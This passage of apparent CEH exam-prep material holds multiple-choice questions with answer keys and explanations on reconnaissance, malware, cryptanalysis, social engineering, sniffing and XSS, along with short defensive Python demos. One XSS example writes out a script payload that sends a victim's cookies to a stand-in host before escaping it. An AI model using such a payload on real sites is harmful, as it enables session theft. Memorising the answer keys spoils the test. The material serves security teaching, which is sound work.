Common classification levels include Public—information suitable for unrestricted disclosure; Internal/Private—information for internal organizational use; Confidential—sensitive business information requiring protection; Restricted/Secret—highly sensitive information with severe impact if disclosed; and Top Secret—critical national security information (government contexts).
Security control mapping applies different protections based on classification: Public data—minimal controls, publicly accessible; Confidential data—encryption, access controls, audit logging; Restricted data—strong encryption, multi-factor authentication, physical security, extensive monitoring.
Implementation benefits include appropriate protection—matching security investment to data value; resource optimization—avoiding over-protection of low-sensitivity data; compliance support—meeting regulatory requirements (GDPR, HIPAA, PCI DSS); incident response—prioritizing responses based on classification; user awareness—clear handling expectations; and legal defensibility—demonstrating due diligence.
Labeling mechanisms mark documents with classification headers/footers, embed metadata in electronic files, use watermarks for sensitive documents, implement color-coding systems, apply physical labels to media, and integrate with DLP systems.
Responsibilities include data owners—business units determining classification; data custodians—IT implementing technical controls; data users—handling data according to classification; and security teams—enforcing policies and monitoring compliance.
Challenges include initial classification effort for existing data, maintaining accuracy as data changes, balancing granularity against complexity, ensuring consistent application across organization, and integrating with technical systems.
Why other options are incorrect:
A) Data Loss Prevention prevents unauthorized data transmission using technical controls. While DLP may use classification for policy enforcement, it’s a technology tool rather than the classification principle itself.
C) Data encryption protects confidentiality through cryptographic transformation. Encryption is a security control that might be applied based on classification rather than the classification process.
D) Data backup ensures availability and recovery capabilities. Backups protect against data loss but don’t involve categorizing data based on sensitivity levels.
Question 173
Which tool is commonly used for passive footprinting to gather domain and network information?
A) Nmap
B) Maltego
C) Metasploit
D) John the Ripper
Answer: B
Explanation:
A) Nmap is primarily used for active scanning to discover open ports, services, and host information. While powerful, it generates network traffic that may alert administrators, so it is not a passive footprinting tool.
B) Maltego is the correct choice because it is designed for passive footprinting and reconnaissance. It can gather domain ownership, email addresses, IP ranges, social media connections, and network relationships without directly interacting with the target. Maltego’s visual graph mapping allows ethical hackers to see relationships between entities, aiding in planning attacks or testing network defenses. Passive footprinting is important because it reduces the risk of detection and provides valuable intelligence before launching active scans or exploitation. Using Maltego, security professionals can create comprehensive digital profiles of organizations, detect weak points, and simulate attack paths.
C) Metasploit is a penetration testing framework used for exploitation and post-exploitation tasks. It is not primarily used for passive reconnaissance but can integrate with footprinting data to execute exploits.
D) John the Ripper is a password-cracking tool and has no capabilities for network or domain footprinting. It is used after passwords or hashes have been obtained to test password strength.
Maltego exemplifies ethical reconnaissance, giving security testers insight into target topology and potential attack vectors without alerting the system owners. It is widely used in social engineering, phishing assessments, and OSINT collection. For CEH preparation, understanding the difference between passive and active tools is crucial: passive tools like Maltego observe and analyze data externally, while active tools like Nmap or Metasploit interact with the target.
Question 174
Which type of malware allows attackers to gain persistent control over a system without detection?
A) Trojan
B) Rootkit
C) Ransomware
D) Worm
Answer: B
Explanation:
A) Trojans are malware disguised as legitimate software. They provide unauthorized access but may not maintain persistence as efficiently as rootkits.
B) Rootkit is the correct answer. Rootkits are designed to hide their presence and maintain persistent control over a system. They operate at the kernel or system level, modifying OS functionality to avoid detection by antivirus tools. Rootkits can conceal processes, files, network connections, and other malware, making it difficult for system administrators to detect the compromise. Attackers use rootkits for long-term espionage, keylogging, or maintaining backdoors. Detecting rootkits requires specialized tools like behavioral analysis, integrity checkers, or offline scanning, because traditional antivirus solutions may not identify them.
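The integrity-checking approach mentioned above can be sketched with standard-library hashing: record a baseline of file digests, then re-hash later and report anything that changed. A minimal illustration (real integrity checkers such as Tripwire or AIDE also track permissions, run from trusted media, and protect their baseline database):

```python
import hashlib
import os
import tempfile

def sha256_file(path: str) -> str:
    """Hash a file in chunks so large binaries don't load fully into memory."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(8192), b""):
            h.update(chunk)
    return h.hexdigest()

def baseline(paths):
    """Record a trusted digest for each monitored file."""
    return {p: sha256_file(p) for p in paths}

def verify(base):
    """Return paths whose current hash differs from the recorded baseline."""
    return [p for p, digest in base.items() if sha256_file(p) != digest]

# Demonstration with a temporary file standing in for a system binary.
with tempfile.TemporaryDirectory() as d:
    target = os.path.join(d, "binary")
    with open(target, "wb") as f:
        f.write(b"original code")
    base = baseline([target])
    with open(target, "wb") as f:  # simulate rootkit tampering
        f.write(b"trojaned code")
    tampered = verify(base)
    print(tampered)  # the modified file is reported
```

Note the limitation this illustrates: a kernel-level rootkit can lie to the very system calls `open()` relies on, which is why offline scanning from trusted media is recommended for rootkit detection.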
C) Ransomware encrypts files and demands payment but does not provide hidden persistent control. Its goal is immediate impact rather than stealthy persistence.
D) Worms are self-replicating malware that spreads across networks. They can cause significant disruption but do not typically maintain stealthy persistence on the system itself.
Rootkits are particularly dangerous because they compromise system integrity, conceal other malware, and evade conventional security tools. CEH exam takers must understand rootkit behavior, installation methods, and detection techniques. Ethical hackers practice analyzing memory dumps, file integrity, and system hooks to detect and mitigate rootkits, which is critical for incident response and malware forensics.
Question 175
Which cryptographic attack attempts to derive a key by analyzing ciphertext and known plaintext pairs?
A) Brute Force Attack
B) Ciphertext-only Attack
C) Known-Plaintext Attack
D) Rainbow Table Attack
Answer: C
Explanation:
A) Brute Force attacks involve trying all possible key combinations until the correct key is found. They rely on exhaustive search and significant computation time rather than on analyzing relationships between plaintext and ciphertext.
B) Ciphertext-only attacks attempt to analyze ciphertext without any knowledge of the plaintext, making it more difficult to derive the encryption key.
C) Known-Plaintext Attack is correct. In this type of attack, the attacker has access to one or more pairs of plaintext and corresponding ciphertext. Using these pairs, the attacker attempts to analyze the encryption algorithm and derive the key or additional plaintexts. This type of attack is common against symmetric encryption schemes and weak ciphers. Cryptanalysts study the relationship between plaintext and ciphertext to break encryption, reveal patterns, or reduce key search space. Knowing plaintext allows the attacker to exploit algorithm weaknesses or implementation flaws effectively.
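The principle is easiest to see against a toy repeating-key XOR cipher, where a single plaintext/ciphertext pair reveals the key directly. This is a deliberately weak cipher chosen for illustration; modern ciphers such as AES are designed to resist known-plaintext analysis:

```python
def xor_cipher(data: bytes, key: bytes) -> bytes:
    """Toy repeating-key XOR 'encryption' (identical for decryption)."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))

key = b"K3y"
plaintext = b"ATTACK AT DAWN"
ciphertext = xor_cipher(plaintext, key)

# Known-plaintext attack: XORing the ciphertext with the known plaintext
# yields the repeating keystream, from which the key is read off.
keystream = bytes(c ^ p for c, p in zip(ciphertext, plaintext))
recovered_key = keystream[:len(key)]
print(recovered_key)  # b'K3y'

# The recovered key now decrypts any other message sent under the same key.
other = xor_cipher(b"RETREAT AT DUSK", key)
print(xor_cipher(other, recovered_key))  # b'RETREAT AT DUSK'
```

This is exactly the scenario the question describes: one known pair compromises every message protected by the same key, which is why key rotation and strong ciphers matter.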
D) Rainbow Table attacks target hashed passwords using precomputed tables to reverse hashes. They attack one-way hash functions rather than deriving encryption keys from plaintext/ciphertext pairs, so they are not a form of known-plaintext cryptanalysis.
CEH candidates should understand cryptanalysis techniques including known-plaintext, chosen-plaintext, and ciphertext-only attacks. Understanding how encryption can be exploited under certain scenarios helps ethical hackers identify weak encryption implementations, assess system security, and propose mitigation strategies. Knowledge of known-plaintext attacks also emphasizes the importance of key rotation, strong ciphers, and proper encryption management to maintain system security.
Question 176
Which type of social engineering involves manipulating users to reveal confidential information over the phone?
A) Phishing
B) Vishing
C) Tailgating
D) Smishing
Answer: B
Explanation:
A) Phishing typically uses emails or messages to trick users into providing credentials or sensitive information.
B) Vishing is correct. Vishing, or voice phishing, involves attackers calling individuals and impersonating trusted entities (like banks or IT support) to extract confidential information such as passwords, PINs, or account details. Attackers often use psychological manipulation, urgency, or fear to convince victims to comply. Vishing can also involve spoofed caller IDs, making it appear as if the call comes from a legitimate source. Ethical hackers studying vishing learn how to detect such attacks, train users, and implement protective measures such as verification procedures and awareness programs.
C) Tailgating refers to physical social engineering, where an unauthorized person gains entry to a restricted area by following an authorized individual.
D) Smishing is similar to phishing but occurs via SMS or messaging apps, tricking users into clicking malicious links or providing data.
Vishing is a critical aspect of social engineering awareness in CEH. Understanding voice-based attack techniques helps professionals design training programs, develop incident response protocols, and test organizational resilience against manipulation. Recognizing behavioral patterns and attack strategies prepares ethical hackers for comprehensive security assessments.
Question 177
Which type of penetration testing involves simulating an external hacker without prior knowledge of the internal network?
A) Black Box Testing
B) White Box Testing
C) Gray Box Testing
D) Red Teaming
Answer: A
Explanation:
A) Black Box Testing is correct. In this type of penetration testing, the tester simulates the actions of an external attacker with no prior knowledge of the target system or network. Black box testing focuses on identifying vulnerabilities from an external perspective, such as public-facing web applications, exposed ports, and network perimeter weaknesses. Testers rely on footprinting, reconnaissance, scanning, and exploitation techniques to find and exploit security gaps. The approach mimics real-world attack scenarios where hackers do not have insider information, making it highly relevant for evaluating an organization’s external defenses.
B) White Box Testing involves full access to internal system documentation, source code, and network diagrams. This type of testing focuses on internal vulnerabilities and code-level flaws, which is different from external attack simulation.
C) Gray Box Testing is a hybrid approach where testers have limited knowledge of the internal systems. While useful, it is not purely an external simulation like black box testing.
D) Red Teaming refers to comprehensive adversary simulation exercises, which may combine physical, social, and digital attack methods. While it includes external testing, it goes beyond black box methodology in scope and strategy.
Black box penetration testing is crucial for CEH professionals because it demonstrates how vulnerable systems appear to outsiders, highlighting misconfigurations, exposed services, and weak authentication. Testers use tools such as Nmap, Nikto, OpenVAS, and Metasploit to detect and exploit vulnerabilities, while documenting findings to improve network security, access control, and monitoring. By performing black box testing, organizations can understand how a malicious external actor might penetrate their defenses and implement defensive strategies, intrusion detection systems, and firewall configurations to mitigate risks. Ethical hackers must also learn to prioritize vulnerabilities, conduct risk assessments, and report actionable remediation steps based on findings from black box testing exercises.
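The external scanning a black-box tester starts with can be sketched as a basic TCP connect scan using only the standard library. To keep the demo self-contained (and legal), it spins up its own listener on localhost and scans that; in practice a tester would target in-scope external hosts, with written authorization:

```python
import socket

def tcp_connect_scan(host: str, ports) -> list:
    """Return the ports that accept a full TCP connection (a connect scan)."""
    open_ports = []
    for port in ports:
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
            s.settimeout(0.5)
            if s.connect_ex((host, port)) == 0:  # 0 means connect succeeded
                open_ports.append(port)
    return open_ports

# Self-contained demo: listen on an OS-assigned port, then scan it.
listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
listener.bind(("127.0.0.1", 0))
listener.listen(5)
open_port = listener.getsockname()[1]

found = tcp_connect_scan("127.0.0.1", [open_port])
print(found == [open_port])  # True
listener.close()
```

A connect scan is the noisiest technique, which is exactly the point for exam purposes: unlike passive reconnaissance, it completes the TCP handshake and therefore appears in target logs, just as the black-box methodology anticipates.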
Question 178
Which wireless attack captures data packets to extract sensitive information such as passwords or session tokens?
A) Evil Twin Attack
B) Packet Sniffing
C) War Driving
D) Bluejacking
Answer: B
Explanation:
A) Evil Twin Attacks involve setting up a rogue access point that mimics a legitimate Wi-Fi network. Users connect to it unknowingly, allowing attackers to intercept data. While effective, this attack specifically exploits network impersonation rather than packet capture alone.
B) Packet Sniffing is correct. It involves capturing network traffic as it traverses the network. Tools like Wireshark, tcpdump, and Ettercap allow attackers to intercept data packets and analyze them for sensitive information including passwords, session cookies, and unencrypted communications. Sniffing is particularly effective on unencrypted wireless networks, where all transmitted data is exposed. Ethical hackers use packet sniffing during penetration testing to assess the strength of network encryption, monitor traffic patterns, and identify security misconfigurations. Proper defense mechanisms include WPA3 encryption, secure VPNs, and network segmentation, which prevent attackers from easily intercepting sensitive data.
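What a sniffer does after capture is header parsing. A minimal sketch that unpacks the fixed 20-byte IPv4 header with the standard struct module; it uses a hand-built sample packet because capturing live traffic requires raw sockets and elevated privileges (the sample addresses are invented):

```python
import socket
import struct

def parse_ipv4_header(raw: bytes) -> dict:
    """Decode the fixed 20-byte IPv4 header from captured bytes."""
    (version_ihl, tos, total_len, ident, flags_frag,
     ttl, proto, checksum, src, dst) = struct.unpack("!BBHHHBBH4s4s", raw[:20])
    return {
        "version": version_ihl >> 4,
        "header_len": (version_ihl & 0x0F) * 4,  # IHL is in 32-bit words
        "ttl": ttl,
        "protocol": proto,                       # 6 = TCP, 17 = UDP
        "src": socket.inet_ntoa(src),
        "dst": socket.inet_ntoa(dst),
    }

# Hand-crafted sample header: IPv4, TTL 64, TCP, 192.168.1.10 -> 10.0.0.5
sample = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 40, 1, 0, 64, 6, 0,
                     socket.inet_aton("192.168.1.10"),
                     socket.inet_aton("10.0.0.5"))
info = parse_ipv4_header(sample)
print(info["src"], "->", info["dst"], "proto", info["protocol"])
```

Tools like Wireshark perform this same decoding layer by layer (Ethernet, IP, TCP, application), which is how credentials in unencrypted protocols end up readable to anyone on the path.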
C) War Driving is the practice of searching for Wi-Fi networks from a moving vehicle. While it can identify networks for potential attacks, it does not involve capturing packets directly.
D) Bluejacking is the act of sending unsolicited messages via Bluetooth to nearby devices. It is generally harmless and unrelated to packet capture or data interception.
Packet sniffing is a core skill for CEH professionals, as it highlights vulnerabilities in network communications. Understanding how data packets can be intercepted, decoded, and analyzed allows ethical hackers to recommend strong encryption practices, secure protocols, and traffic monitoring solutions. Mastery of packet sniffing also underpins network intrusion detection, penetration testing, and threat analysis, enabling organizations to preemptively secure their wireless and wired networks against malicious eavesdropping.
Question 179
Which attack exploits web applications by inserting malicious scripts into client-side code executed by a browser?
A) SQL Injection
B) Cross-Site Scripting (XSS)
C) Command Injection
D) Directory Traversal
Answer: B
Explanation:
A) SQL Injection targets databases by inserting malicious SQL commands to manipulate or retrieve data. While serious, it primarily affects the server-side database rather than client-side execution.
B) Cross-Site Scripting (XSS) is correct. XSS occurs when attackers inject malicious scripts into web pages, which are executed in a victim’s browser. This can lead to cookie theft, session hijacking, or unauthorized actions on behalf of the user. There are different types of XSS attacks: stored, reflected, and DOM-based, each with specific use cases and detection challenges. Ethical hackers must learn to test web applications for input validation flaws, output encoding deficiencies, and inadequate content security policies to prevent XSS vulnerabilities. Defense strategies include sanitizing inputs, implementing CSP headers, and using secure coding practices.
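The output-encoding defense mentioned above can be demonstrated with Python's standard html.escape, which neutralizes a script payload before rendering. A minimal sketch (real applications also need context-aware encoding and CSP headers; the payload URL is an invented example):

```python
from html import escape

def render_comment(user_input: str) -> str:
    """Build an HTML fragment with untrusted input safely encoded."""
    return f"<p>{escape(user_input, quote=True)}</p>"

# A typical cookie-stealing payload; the domain is hypothetical.
payload = '<script>location="https://evil.example/?c="+document.cookie</script>'
safe = render_comment(payload)
print(safe)

# The angle brackets become &lt; / &gt;, so the browser renders inert
# text instead of executing a script.
print("<script>" in safe)  # False
```

Escaping on output rather than input is the key design choice: the stored data stays intact, and every rendering context applies the encoding appropriate to it.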
C) Command Injection exploits server-side execution commands, not client-side scripts in a browser. It allows attackers to execute arbitrary commands on a server hosting the web application.
D) Directory Traversal attacks aim to access restricted files on a server by manipulating file paths. While critical, it does not involve client-side script execution.
Understanding XSS is vital for CEH candidates because it demonstrates how poorly validated input or output encoding can compromise client security. XSS attacks can target end-users directly, bypassing server security mechanisms. By mastering detection and prevention techniques, ethical hackers can secure web applications, protect sensitive data, and mitigate risks of session hijacking and credential theft. Security best practices include input filtering, secure frameworks, and user education, which together strengthen web application defenses against XSS attacks.
Question 180
Which malware type spreads automatically across networks without user intervention?
A) Worm
B) Trojan
C) Spyware
D) Adware
Answer: A
Explanation:
A) Worm is correct. Worms are self-replicating malware that propagate automatically across networks by exploiting vulnerabilities. Unlike viruses, worms do not require user action to spread. They can rapidly infect multiple systems, consume bandwidth, and cause network congestion or outages. Examples include Morris Worm, WannaCry, and Conficker. Ethical hackers study worms to understand infection mechanisms, propagation techniques, and containment strategies, ensuring proper network defense and incident response planning.
B) Trojans rely on user interaction to execute and do not self-replicate across networks. They often disguise themselves as legitimate applications to trick users into installation.
C) Spyware collects information covertly from the user’s system, but it does not spread automatically. It relies on installation vectors like downloads or phishing.
D) Adware delivers unwanted advertisements and may track user behavior but does not autonomously propagate across networks.
Understanding worms is essential for CEH professionals to design effective security controls such as firewalls, intrusion detection/prevention systems, and patch management. Worm analysis also informs incident response procedures, isolation techniques, and remediation strategies. Studying worm behavior highlights the importance of network segmentation, vulnerability management, and continuous monitoring in maintaining cybersecurity. By recognizing the rapid spread and potential damage of worms, ethical hackers can implement proactive measures to protect critical systems and networks from uncontrolled malware outbreaks.